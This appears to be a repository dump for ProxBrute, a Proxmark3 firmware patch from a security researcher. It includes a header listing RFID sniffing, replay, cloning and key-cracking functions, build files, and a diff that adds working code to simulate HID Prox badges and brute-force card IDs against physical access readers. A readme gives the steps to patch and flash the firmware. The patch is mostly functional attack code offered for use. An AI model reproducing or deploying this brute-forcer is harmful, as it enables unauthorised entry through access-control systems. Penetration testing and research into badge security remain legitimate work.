111 | void iso14a_set_trigger(bool enable); 112 | 113 | void RAMFUNC SniffMifare(uint8_t param); 114 | 115 | /// epa.h 116 | void EPA_PACE_Collect_Nonce(UsbCommand * c); 117 | void EPA_PACE_Replay(UsbCommand *c); 118 | 119 | // mifarecmd.h 120 | void ReaderMifare(bool first_try); 121 | int32_t dist_nt(uint32_t nt1, uint32_t nt2); 122 | void MifareReadBlock(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *data); 123 | void MifareUReadBlock(uint8_t arg0, uint8_t arg1, uint8_t *datain); 124 | void MifareUC_Auth(uint8_t arg0, uint8_t *datain); 125 | void MifareUReadCard(uint8_t arg0, uint16_t arg1, uint8_t arg2, uint8_t *datain); 126 | void MifareReadSector(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 127 | void MifareWriteBlock(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 128 | //void MifareUWriteBlockCompat(uint8_t arg0,uint8_t *datain); 129 | void MifareUWriteBlock(uint8_t arg0, uint8_t arg1, uint8_t *datain); 130 | void MifareNested(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 131 | void MifareChkKeys(uint16_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 132 | void Mifare1ksim(uint8_t arg0, uint8_t arg1, uint8_t arg2, uint8_t *datain); 133 | void MifareSetDbgLvl(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 134 | void MifareEMemClr(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 135 | void MifareEMemSet(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 136 | void MifareEMemGet(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 137 | void MifareECardLoad(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 138 | void MifareCSetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); // Work with "magic Chinese" card 139 | void MifareCGetBlock(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 140 | void MifareCIdent(); // is "magic chinese" card? 141 | void MifareUSetPwd(uint8_t arg0, uint8_t *datain); 142 | 143 | //desfire 144 | void Mifare_DES_Auth1(uint8_t arg0,uint8_t *datain); 145 | void Mifare_DES_Auth2(uint32_t arg0, uint8_t *datain); 146 | 147 | // mifaredesfire.h 148 | bool InitDesfireCard(); 149 | void MifareSendCommand(uint8_t arg0,uint8_t arg1, uint8_t *datain); 150 | void MifareDesfireGetInformation(); 151 | void MifareDES_Auth1(uint8_t arg0,uint8_t arg1,uint8_t arg2, uint8_t *datain); 152 | void ReaderMifareDES(uint32_t param, uint32_t param2, uint8_t * datain); 153 | int DesfireAPDU(uint8_t *cmd, size_t cmd_len, uint8_t *dataout); 154 | size_t CreateAPDU( uint8_t *datain, size_t len, uint8_t *dataout); 155 | void OnSuccess(); 156 | void OnError(uint8_t reason); 157 | 158 | 159 | /// iso15693.h 160 | void RecordRawAdcSamplesIso15693(void); 161 | void AcquireRawAdcSamplesIso15693(void); 162 | void ReaderIso15693(uint32_t parameter); // Simulate an ISO15693 reader - greg 163 | void SimTagIso15693(uint32_t parameter, uint8_t *uid); // simulate an ISO15693 tag - greg 164 | void BruteforceIso15693Afi(uint32_t speed); // find an AFI of a tag - atrox 165 | void DirectTag15693Command(uint32_t datalen,uint32_t speed, uint32_t recv, uint8_t data[]); // send arbitrary commands from CLI - atrox 166 | void SetDebugIso15693(uint32_t flag); 167 | 168 | /// iclass.h 169 | void RAMFUNC SnoopIClass(void); 170 | void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain); 171 | void ReaderIClass(uint8_t arg0); 172 | void ReaderIClass_Replay(uint8_t arg0,uint8_t *MAC); 173 | void IClass_iso14443A_GetPublic(uint8_t arg0); 174 | void iClass_Authentication(uint8_t *MAC); 175 | void iClass_WriteBlock(uint8_t blockNo, uint8_t *data); 176 | void iClass_ReadBlk(uint8_t blockNo); 177 | bool iClass_ReadBlock(uint8_t blockNo, uint8_t *readdata); 178 | void iClass_Dump(uint8_t blockno, uint8_t numblks); 179 | void iClass_Clone(uint8_t startblock, uint8_t endblock, uint8_t *data); 180 | void iClass_ReadCheck(uint8_t blockNo, uint8_t keyType); 181 | 182 | // hitag2.h 183 | void SnoopHitag(uint32_t type); 184 | void SimulateHitagTag(bool tag_mem_supplied, byte_t* data); 185 | void ReaderHitag(hitag_function htf, hitag_data* htd); 186 | 187 | //hitagS.h 188 | void SimulateHitagSTag(bool tag_mem_supplied, byte_t* data); 189 | void ReadHitagS(hitag_function htf, hitag_data* htd); 190 | void WritePageHitagS(hitag_function htf, hitag_data* htd,int page); 191 | void check_challenges(bool file_given, byte_t* data); 192 | 193 | 194 | // cmd.h 195 | bool cmd_receive(UsbCommand* cmd); 196 | bool cmd_send(uint32_t cmd, uint32_t arg0, uint32_t arg1, uint32_t arg2, void* data, size_t len); 197 | 198 | /// util.h 199 | void HfSnoop(int , int); 200 | 201 | #endif 202 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/patch/common/Makefile.common: -------------------------------------------------------------------------------- 1 | #----------------------------------------------------------------------------- 2 | # This code is licensed to you under the terms of the GNU GPL, version 2 or, 3 | # at your option, any later version. See the LICENSE.txt file for the text of 4 | # the license. 5 | #----------------------------------------------------------------------------- 6 | # Common makefile functions for all platforms 7 | #----------------------------------------------------------------------------- 8 | 9 | # This new makefile replaces the previous Makefile/Makefile.linux 10 | # with as much common code for both environments as possible. 11 | # Following is a short OS detection to set up variables, all the 12 | # remaining Makefile should be portable and only depend on these 13 | # variables 14 | # 15 | 16 | # Make sure that all is the default target 17 | # (The including Makefile still needs to define what 'all' is) 18 | 19 | platform = $(shell uname) 20 | 21 | all: 22 | 23 | CROSS ?= arm-none-eabi- 24 | CC = $(CROSS)gcc 25 | AS = $(CROSS)as 26 | LD = $(CROSS)ld 27 | OBJCOPY = $(CROSS)objcopy 28 | GZIP=gzip 29 | 30 | OBJDIR = obj 31 | 32 | INCLUDE = -I../include -I../common 33 | 34 | TAR=tar 35 | TARFLAGS = -C .. -rvf 36 | 37 | # Windows' echo echos its input verbatim, on Posix there is some 38 | # amount of shell command line parsing going on. echo "" on 39 | # Windows yields literal "", on Linux yields an empty line 40 | ifeq ($(shell echo ""),) 41 | 42 | # This is probably a proper system, so we can use uname 43 | UNAME := $(shell uname) 44 | DELETE=rm -rf 45 | MOVE=mv 46 | COPY=cp 47 | PATHSEP=/ 48 | FLASH_TOOL=client/flasher 49 | DETECTED_OS=$(UNAME) 50 | 51 | else 52 | 53 | # Assume that we are running on Windows. 54 | DELETE=del /q 55 | MOVE=ren 56 | COPY=copy 57 | PATHSEP=\\# 58 | #FLASH_TOOL=winsrc\\prox.exe 59 | FLASH_TOOL=winsrc\\flash.exe 60 | DETECTED_OS=Windows 61 | 62 | endif 63 | 64 | 65 | # Also search prerequisites in the common directory (for usb.c), the fpga directory (for fpga.bit), and the zlib directory 66 | VPATH = . ../common ../fpga ../zlib 67 | 68 | INCLUDES = ../include/proxmark3.h ../include/at91sam7s512.h ../include/config_gpio.h ../include/usb_cmd.h $(APP_INCLUDES) 69 | 70 | CFLAGS = -c $(INCLUDE) -Wall -pedantic -std=c99 -Os $(APP_CFLAGS) 71 | LDFLAGS = -nostartfiles -nodefaultlibs -Wl,-gc-sections -n 72 | 73 | LIBS = -lgcc 74 | 75 | THUMBOBJ = $(patsubst %.c,$(OBJDIR)/%.o,$(notdir $(THUMBSRC))) 76 | ARMOBJ = $(patsubst %.c,$(OBJDIR)/%.o,$(notdir $(ARMSRC))) 77 | ASMOBJ = $(patsubst %.s,$(OBJDIR)/%.o,$(notdir $(ASMSRC))) 78 | VERSIONOBJ = $(OBJDIR)/version.o 79 | 80 | $(THUMBOBJ): $(OBJDIR)/%.o: %.c $(INCLUDES) 81 | $(CC) $(CFLAGS) -mthumb -mthumb-interwork -o $@ $< 82 | 83 | $(ARMOBJ): $(OBJDIR)/%.o: %.c $(INCLUDES) 84 | $(CC) $(CFLAGS) -mthumb-interwork -o $@ $< 85 | 86 | $(ASMOBJ): $(OBJDIR)/%.o: %.s 87 | $(CC) $(CFLAGS) -mthumb-interwork -o $@ $< 88 | 89 | $(VERSIONOBJ): $(OBJDIR)/%.o: %.c $(INCLUDES) 90 | $(CC) $(CFLAGS) -mthumb -mthumb-interwork -o $@ $< 91 | 92 | # This objcopy call translates physical flash addresses to logical addresses 93 | # without touching start address or RAM addresses (.bss and .data sections) 94 | # See ldscript.common. -- Henryk Plötz 2009-08-27 95 | OBJCOPY_TRANSLATIONS = --no-change-warnings \ 96 | --change-addresses -0x100000 --change-start 0 \ 97 | --change-section-address .bss+0 --change-section-address .data+0 \ 98 | --change-section-address .commonarea+0 99 | $(OBJDIR)/%.s19: $(OBJDIR)/%.elf 100 | $(OBJCOPY) -Osrec --srec-forceS3 --strip-debug $(OBJCOPY_TRANSLATIONS) $^ $@ 101 | 102 | # version.c should be remade on every compilation 103 | .PHONY: version.c 104 | version.c: default_version.c 105 | perl ../tools/mkversion.pl .. > $@ || $(COPY) $^ $@ 106 | 107 | # Automatic dependency generation 108 | DEPENDENCY_FILES = $(patsubst %.c,$(OBJDIR)/%.d,$(notdir $(THUMBSRC))) \ 109 | $(patsubst %.c,$(OBJDIR)/%.d,$(notdir $(ARMSRC))) \ 110 | $(patsubst %.s,$(OBJDIR)/%.d,$(notdir $(ASMSRC))) 111 | 112 | $(DEPENDENCY_FILES): Makefile ../common/Makefile.common 113 | 114 | $(patsubst %.o,%.d,$(THUMBOBJ) $(ARMOBJ)): $(OBJDIR)/%.d: %.c 115 | @$(CC) -MM -MT "$(@) $(@:.d=.o)" $(CFLAGS) $< > $@ 116 | $(patsubst %.o,%.d,$(ASMOBJ)):$(OBJDIR)/%.d: %.s 117 | @$(CC) -MM -MT "$(@) $(@:.d=.o)" $(CFLAGS) $< > $@ 118 | 119 | -include $(DEPENDENCY_FILES) 120 | -------------------------------------------------------------------------------- /proxbrute-bundle-r517.tar.bz2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/brad-anton/proxbrute/34e5b07aaf40fe6a053b87d0f22ca02e7fc854a7/proxbrute-bundle-r517.tar.bz2 -------------------------------------------------------------------------------- /proxbrute-bundle-v0.3.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/brad-anton/proxbrute/34e5b07aaf40fe6a053b87d0f22ca02e7fc854a7/proxbrute-bundle-v0.3.tar.gz -------------------------------------------------------------------------------- /proxbrute-r517.patch: -------------------------------------------------------------------------------- 1 | diff -uNr proxmark3-read-only//armsrc/appmain.c proxmark3-r517//armsrc/appmain.c 2 | --- proxmark3-read-only//armsrc/appmain.c 2011-12-27 13:04:25.000000000 -0800 3 | +++ proxmark3-r517//armsrc/appmain.c 2011-12-27 11:22:31.000000000 -0800 4 | @@ -186,7 +186,7 @@ 5 | void MeasureAntennaTuning(void) 6 | { 7 | uint8_t *dest = (uint8_t *)BigBuf; 8 | - int i, ptr = 0, adcval = 0, peak = 0, peakv = 0, peakf = 0;; 9 | + int i, ptr, adcval = 0, peak = 0, peakv = 0, peakf = 0; 10 | int vLf125 = 0, vLf134 = 0, vHf = 0; // in mV 11 | 12 | UsbCommand c; 13 | @@ -363,6 +363,10 @@ 14 | int selected = 0; 15 | int playing = 0; 16 | 17 | + // ProxBrute Stuff: 18 | + unsigned int i; 19 | + unsigned int ZERO=0x00000000; 20 | + 21 | // Turn on selected LED 22 | LED(selected + 1, 0); 23 | 24 | @@ -423,9 +427,48 @@ 25 | // wait for button to be released 26 | while(BUTTON_PRESS()) 27 | WDT_HIT(); 28 | - Dbprintf("%x %x %x", selected, high[selected], low[selected]); 29 | - CmdHIDsimTAG(high[selected], low[selected], 0); 30 | - DbpString("Done playing"); 31 | + 32 | +/* START PROXBRUTE */ 33 | + 34 | +/* 35 | + ProxBrute - brad a. - foundstone 36 | + 37 | + Following code is a trivial brute forcer once you read a valid tag 38 | + the idea is you get a valid tag, then just try and brute force to 39 | + another priv level. The problem is that it has no idea if the code 40 | + worked or not, so its a crap shoot. One option is to time how long 41 | + it takes to get a valid ID then start from scratch every time. 42 | +*/ 43 | + 44 | + if ( selected == 1 ) { 45 | + DbpString("Entering ProxBrute Mode"); 46 | + DbpString("brad a. - foundstone"); 47 | + Dbprintf("Current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]); 48 | + LED(LED_ORANGE,0); 49 | + LED(LED_RED,0); 50 | + for (i=low[selected]-1;i>ZERO;i--) { 51 | + if(BUTTON_PRESS()) { 52 | + DbpString("Told to Stop"); 53 | + break; 54 | + } 55 | + 56 | + Dbprintf("Trying Facility = %08x ID %08x", high[selected], i); 57 | + CmdHIDsimTAGProxBrute(high[selected], i, 0); 58 | + SpinDelay(500); 59 | + } 60 | + 61 | + } else { 62 | + DbpString("Red is lit, not entering ProxBrute Mode"); 63 | + Dbprintf("%x %x %x", selected, high[selected], low[selected]); 64 | + CmdHIDsimTAG(high[selected], low[selected], 0); 65 | + DbpString("Done playing"); 66 | + } 67 | + 68 | + 69 | + 70 | + 71 | +/* END PROXBRUTE */ 72 | + 73 | if (BUTTON_HELD(1000) > 0) 74 | { 75 | DbpString("Exiting"); 76 | diff -uNr proxmark3-read-only//armsrc/apps.h proxmark3-r517//armsrc/apps.h 77 | --- proxmark3-read-only//armsrc/apps.h 2011-12-27 13:04:25.000000000 -0800 78 | +++ proxmark3-r517//armsrc/apps.h 2011-12-27 11:07:14.000000000 -0800 79 | @@ -91,6 +91,11 @@ 80 | void AcquireTiType(void); 81 | void AcquireRawBitsTI(void); 82 | void SimulateTagLowFrequency(int period, int gap, int ledcontrol); 83 | +// ProxBrute - created this function so that i didnt mess with anything 84 | +// important - needed to only send a couple tags then goto next 85 | +void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol); 86 | +void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol); 87 | + 88 | void CmdHIDsimTAG(int hi, int lo, int ledcontrol); 89 | void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol); 90 | void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen); 91 | diff -uNr proxmark3-read-only//armsrc/lfops.c proxmark3-r517//armsrc/lfops.c 92 | --- proxmark3-read-only//armsrc/lfops.c 2011-12-27 13:04:25.000000000 -0800 93 | +++ proxmark3-r517//armsrc/lfops.c 2011-12-27 13:04:05.000000000 -0800 94 | @@ -484,6 +484,67 @@ 95 | } 96 | } 97 | 98 | +// ProxBrute - created this function so that i didnt mess with anything 99 | +// important - needed to only send a set number of tags 100 | +void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol) 101 | +{ 102 | + int i; 103 | + int x=0; 104 | + uint8_t *tab = (uint8_t *)BigBuf; 105 | + 106 | + FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_SIMULATOR); 107 | + 108 | + AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT | GPIO_SSC_CLK; 109 | + 110 | + AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT; 111 | + AT91C_BASE_PIOA->PIO_ODR = GPIO_SSC_CLK; 112 | + 113 | +#define SHORT_COIL() LOW(GPIO_SSC_DOUT) 114 | +#define OPEN_COIL() HIGH(GPIO_SSC_DOUT) 115 | + 116 | + i = 0; 117 | + x = 0; 118 | + for(;;) { 119 | + while(!(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK)) { 120 | + 121 | + if(BUTTON_PRESS() || x == 20000 ) { 122 | + DbpString("Stopped"); 123 | + return; 124 | + } 125 | + WDT_HIT(); 126 | + } 127 | + 128 | + if (ledcontrol) 129 | + LED_D_ON(); 130 | + 131 | + if(tab[i]) 132 | + OPEN_COIL(); 133 | + else 134 | + SHORT_COIL(); 135 | + 136 | + if (ledcontrol) 137 | + LED_D_OFF(); 138 | + 139 | + while(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK) { 140 | + if(BUTTON_PRESS() || x == 20000 ) { 141 | + DbpString("Stopped"); 142 | + return; 143 | + } 144 | + WDT_HIT(); 145 | + } 146 | + x++; 147 | + i++; 148 | + if(i == period) { 149 | + i = 0; 150 | + if (gap) { 151 | + SHORT_COIL(); 152 | + SpinDelayUs(gap); 153 | + } 154 | + } 155 | + } 156 | +} 157 | + 158 | + 159 | /* Provides a framework for bidirectional LF tag communication 160 | * Encoding is currently Hitag2, but the general idea can probably 161 | * be transferred to other encodings. 162 | @@ -780,6 +841,62 @@ 163 | LED_A_OFF(); 164 | } 165 | 166 | +// ProxBrute - I know this is rediculous to do this 167 | +void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol) 168 | +{ 169 | + int n=0, i=0; 170 | + /* 171 | + HID tag bitstream format 172 | + The tag contains a 44bit unique code. This is sent out MSB first in sets of 4 bits 173 | + A 1 bit is represented as 6 fc8 and 5 fc10 patterns 174 | + A 0 bit is represented as 5 fc10 and 6 fc8 patterns 175 | + A fc8 is inserted before every 4 bits 176 | + A special start of frame pattern is used consisting a0b0 where a and b are neither 0 177 | + nor 1 bits, they are special patterns (a = set of 12 fc8 and b = set of 10 fc10) 178 | + */ 179 | + 180 | + if (hi>0xFFF) { 181 | + DbpString("Tags can only have 44 bits."); 182 | + return; 183 | + } 184 | + fc(0,&n); 185 | + // special start of frame marker containing invalid bit sequences 186 | + fc(8, &n); fc(8, &n); // invalid 187 | + fc(8, &n); fc(10, &n); // logical 0 188 | + fc(10, &n); fc(10, &n); // invalid 189 | + fc(8, &n); fc(10, &n); // logical 0 190 | + 191 | + WDT_HIT(); 192 | + // manchester encode bits 43 to 32 193 | + for (i=11; i>=0; i--) { 194 | + if ((i%4)==3) fc(0,&n); 195 | + if ((hi>>i)&1) { 196 | + fc(10, &n); fc(8, &n); // low-high transition 197 | + } else { 198 | + fc(8, &n); fc(10, &n); // high-low transition 199 | + } 200 | + } 201 | + 202 | + WDT_HIT(); 203 | + // manchester encode bits 31 to 0 204 | + for (i=31; i>=0; i--) { 205 | + if ((i%4)==3) fc(0,&n); 206 | + if ((lo>>i)&1) { 207 | + fc(10, &n); fc(8, &n); // low-high transition 208 | + } else { 209 | + fc(8, &n); fc(10, &n); // high-low transition 210 | + } 211 | + } 212 | + 213 | + if (ledcontrol) 214 | + LED_A_ON(); 215 | + SimulateTagLowFrequencyProxBrute(n, 0, ledcontrol); 216 | + 217 | + if (ledcontrol) 218 | + LED_A_OFF(); 219 | +} 220 | + 221 | + 222 | 223 | // loop to capture raw HID waveform then FSK demodulate the TAG ID from it 224 | void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) 225 | diff -uNr proxmark3-read-only//client/Makefile proxmark3-r517//client/Makefile 226 | --- proxmark3-read-only//client/Makefile 2011-12-27 13:04:25.000000000 -0800 227 | +++ proxmark3-r517//client/Makefile 2011-12-27 13:06:20.000000000 -0800 228 | @@ -12,7 +12,7 @@ 229 | VPATH = ../common 230 | OBJDIR = obj 231 | 232 | -LDLIBS = -L/opt/local/lib -L/usr/local/lib -lusb -lreadline -lpthread 233 | +LDLIBS = -L/opt/local/lib -L/usr/local/lib -lusb -lreadline -lpthread -lncurses 234 | LDFLAGS = $(COMMON_FLAGS) 235 | CFLAGS = -std=gnu99 -I. -I../include -I../common -I/opt/local/include -Wall -Wno-unused-function $(COMMON_FLAGS) -g -O3 236 | 237 | diff -uNr proxmark3-read-only//common/Makefile.common proxmark3-r517//common/Makefile.common 238 | --- proxmark3-read-only//common/Makefile.common 2011-12-27 13:04:25.000000000 -0800 239 | +++ proxmark3-r517//common/Makefile.common 2011-12-27 11:29:17.000000000 -0800 240 | @@ -65,7 +65,7 @@ 241 | 242 | INCLUDES = ../include/proxmark3.h ../include/at91sam7s512.h ../include/config_gpio.h ../include/usb_cmd.h $(APP_INCLUDES) 243 | 244 | -CFLAGS = -c $(INCLUDE) -Wall -Werror -pedantic -std=gnu99 $(APP_CFLAGS) 245 | +CFLAGS = -c $(INCLUDE) -Wall -pedantic -std=gnu99 $(APP_CFLAGS) 246 | LDFLAGS = -nostartfiles -nodefaultlibs -Wl,-gc-sections -n 247 | LIBS = -lgcc 248 | -------------------------------------------------------------------------------- /readme: -------------------------------------------------------------------------------- 1 | ProxBrute v0.3 for r517 2 | by brad antoniewicz 3 | foundstone 4 | ------------------------ 5 | 6 | To patch SVN r517: 7 | svn co -r 517 http://proxmark3.googlecode.com/svn/trunk proxmark3-read-only 8 | cd proxmark3-read-only (or whatever) 9 | patch -p1 < ../proxbrute-bundle/proxbrute-r517.patch 10 | cd armsrc 11 | make 12 | 13 | Or just flash with 14 | 15 | client/flasher images/osimage.elf 16 | 17 | For everything else, see the whitepaper on foundstone.com 18 | --------------------------------------------------------------------------------